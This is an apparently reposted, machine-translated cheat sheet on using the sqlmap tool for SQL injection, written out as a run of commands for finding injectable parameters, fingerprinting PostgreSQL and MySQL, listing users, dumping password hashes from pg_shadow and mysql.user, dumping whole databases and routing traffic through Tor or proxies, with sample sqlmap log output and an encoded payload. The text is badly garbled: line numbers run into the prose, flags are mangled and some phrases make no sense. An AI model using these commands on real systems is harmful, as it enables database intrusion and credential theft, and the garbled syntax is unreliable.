Injection of common statements

Injection of common statements Tuserssinp4webserveroperatingsystem: LinuxUbuntu8.10 (IntrepidIbex) DBMS: PostgreSQL: Taobao. This is done by mickey. If you don't talk about it, respect the original author and repeat the instructions on mickey sorting. 2122 update 23

Common injection Statement T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL: users id blissettnameisnull bunnyming, which is compiled by mickey, respect the original author and repost and indicate that the mickey is ready for sorting. 21, 22, and 23

Injection of common statements

T users sinp> 4web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL: users id blissettnameisnull bunnyming, which is compiled by mickey, respect the original author and repost and indicate that the mickey is enough. 21 22, update 23 svn checkout. https://svn.sqlmap.org/sqlmap/trunk/sqlmap Sqlmap-devm = 1 "-v 1-SQL-shell // Execute SQL statement m more detailed information options from a configuration INI file 30 sqlmap-c sqlmap. conf 31 32 use the POST method to submit sqlmap/oracle/post_int.php "-method POST-data sqlmapagent" Mozillapython sqlmap. py sqlmapa ".agents.txt "46 47 Use Basic Authentication sqlmap use Digest authentication sqlmap use proxy, use TORsqlmap.1.47: 3128" sqlmap.1.47: 8118 "56 57 use multi-thread guessing sqlmap-threads to bypass dynamic detection, directly specify parameters with injection points. You can use them to separate multiple parameters and specify user-agent to inject sqlmapp "idsqlmapcatp" cat, id "sqlmapagent "-. 7rc1 ( http://sqlmap.sourceforge.net ) "64 65 specifies the database, bypassing SQLMAP's automatic detection sqlmap/pgsql/get_int.php? Id = 1 "-v 2-dbms" PostgreSQL "MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 specify the operating system and bypass SQLMAP to automatically detect sqlmap/pgsql/get_int.php? Id = 1 "-v 2-OS" Windows "Linux 77 * Windows 78 79 custom payload 80 Options: -prefix and-postfixcircumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly provid Ing a injection payload prefix and/or postfix. users. ') LIMIT 0, 1 ″;:. "test" 87 88 [...] 89 [hh: mm: 16] [INFO] testing SQL injection on GET parameter 'id' with 0 parenthesis 90 [hh: mm: 16] [INFO] testing custom injection on GET parameter 'id' 91 [hh: mm: 16] [traffic out] HTTP request: 92 GET/sqlmap/mysql/get_str_brackets.php? Id = 1% 27% 29% 207433 20AND % 7433% = 93% 20AND % 20 28% 1.1 27 test % 27 = % 27 test HTTP/0.7 94 Accept-charset: ISO-8859-15, UTF-8; q =, *; q = 0.7 95 Host: 192.168.1.121: 80 96 Accept-language: en-us, en; q = 0.5 97 Accept: text/xml, application/xml, application/xhtml + xml, text/html; q = 0.9, text/plain; q = 0.8, 98 image/png, */*; q = 0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close101 [...] 102 [hh: mm: 17] [INFO] GET parameter 'id' Is custom injectable103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id = 1% 27% 29% 20AND % 207433 = 7433% 20AND % 20% 28% 27 test % 27 = % 27test108 109 which URL decoded is: testmakes the query syntatically correct to the page query: users ('test' = 'test') LIMIT 0, 1116 117 In this simple example, sqlmap cocould detect the SQL injection and exploit it without need to pr Ovide a custom injection payload, but sometimes in the real world application it is necessary to provide it.118 119 Page Comparison 120 python sqlmap. py-u "? Id = 1 "-string" luther "-v 1121 python sqlmap. py-u"? Id = 1 "-regexp"Lu [\ w] [\ w] er "-v122 123 exclude website content 124 python sqlmap. py-u"? Id = 1 "-excl-reg" Dynamic content: ([\ d] +) "125 126 multi-statement test, php nested function mysql_query (), multi-statement 127 python sqlmap is not supported. py-u "? Id = 1 "-stacked-test-v 1128 129 union injection test 130 python sqlmap. py-u"? Id = 1 "-union-test-v 1131 132 unionz injection with orderby133 python sqlmap. py-u"? Id = 1 "-union-test-union-tech orderby-v 1134 135 python sqlmap. py-u"? Id = 1 "-v 1-union-use-banner136 python sqlmap. py-u"? Id = 1 "-v 5-union-use-current-user137 python sqlmap. py-u"? Id = 1 "-v 1-union-use-dbs138 139 fingerprint140 python sqlmap. py-u"? Id = 1 "-v 1-f141 python sqlmap. py-u"? Name = luther "-v 1-f-b142 143 judge whether the current user is dba144 python sqlmap. py-u"? Id = 1 "-is-dba-v 1145 146 list database users 147 python sqlmap. py-u"? Id = 1 "-users-v 0148 149 list database user passwords 150 python sqlmap. py-u"? Id = 1 "-passwords-v 0151 python sqlmap. py-u"? Id = 1 "-passwords-U sa-v 0152 153 view User Permissions 154 python sqlmap. py-u"? Id = 1 "-privileges-v 0155 python sqlmap. py-u"? Id = 1 "-privileges-U postgres-v 0156 157 column database 158 python sqlmap. py-u"? Id = 1 "-dbs-v 0159 160 List the names of columns in the specified table of the specified database 161 python sqlmap. py-u"? Id = 1 "-columns-T users-D test-v 1162 163 list the content of the specified column in the specified table of the specified database 164 python sqlmap. py-u"? Id = 1 "-dump-T users-D master-C surname-v 0165 166 specify the column range from 2-4167 python sqlmap. py-u"? Id = 1 "-dump-T users-D test-start 2-stop 4-v 0168 169 export all databases, the content of all tables is 170 python sqlmap. py-u"? Id = 1 "-dump-all-v 0171 172 only list the content of the database and table created by the user. 173 python sqlmap. py-u"? Id = 1 "-dump-all-exclude-sysdbs-v 0174 175 SQL query176 python sqlmap. py-u"? Id = 1 "-SQL-query" SELECT usename FROM pg_user "-v 0177 python sqlmap. py-u"? Id = 1 "-SQL-query" SELECT host, password FROM mysql. user LIMIT 1, 3 "-v 1178 179 SELECT usename, passwd FROM pg_shadow order by usename180 181 save and resume session 182 python sqlmap. py-u "? Id = 1 "-B-v 1-s" sqlmap. log "183 Save the option to INC configuration file 184 python sqlmap. py-u"? Id = 1 "-B-v 1-save ============================== ======================================2, sqlmap-g "keyword" // This is injected through google search, not yet. I don't know why. The website space can be directly changed to Baidu 194 3. 195 python sqlmap. py-u" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-v 1 [hh: mm: 25] [INFO] testing if the url is stable, wait a few seconds 199 [hh: mm: 26] [INFO] url is stable id 'is dynamic id' 204 [hh: mm: 26] [INFO] testing numeric/unescaped injection on GET parameter [hh: mm: 26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh: mm: 26] [INFO] testing MySQL) 211 [hh: mm: 26] [INFO] retrieved: 55 212 [hh: mm: 26] [INFO] Saved med 20 queries in 0 seconds 213 [hh: mm: 26] [INFO] confirming MySQL) 215 [hh: mm: 26] [INFO] retrieved: 1 216 [hh: mm: 26] [INFO] Saved med 13 queries in 0 seconds 217 [hh: mm: 26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh: mm: 26] [INFO] retrieved: 5 220 [hh: mm: 26] [INFO] Saved med 13 queries in 0 seconds 221 remote DBMS: MySQL> = 5.0.0 4. Specify parameters to inject python sqlmap. py-u" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-v 1 228-p" id "[hh: mm: 17] [INFO] testing if the url is stable, wait a few seconds 232 [hh: mm: 18] [INFO] url is stable id '234 [hh: mm: 18] [INFO] testing numeric/unescaped injection on parameter [hh: mm: 18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] or if you want to provide more than one parameter, for instance: $ python sqlmap. py-u" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-v 246 1-p" cat, id "5. Data of the specified method and post 250 python sqlmap. py-u" http://192.168.1.47/page.php "-- Method" POST "-- 251 data" id = 1 & cat = 2 "6. Specify the cookie and inject some python sqlmap. py-u addresses to be logged on" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-- cookie 256" COOKIE_VALUE "7. Inject 260 python sqlmap. py-u" via proxy" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-- proxy 261" http://127.0.0.1:8118 "262 8. Specify the keyword, Hong Kong server, or not. The program will automatically judge 263 python sqlmap. py-u "based on the hash of the returned result" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-- string 264" STRING_ON_TRUE_PAGE "265 9. Specify the data so that you do not have to guess other databases. It can improve efficiency. 266 -- remote-dbms 267 10. Fingerprint Identification Database Type 268 python sqlmap. py-u" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-v 1-f 269 11. Obtain banner information 270 python sqlmap. py-u" http://192.168.1.47/page.php ? Id = 1 & cat = 2 "-B.

Posted on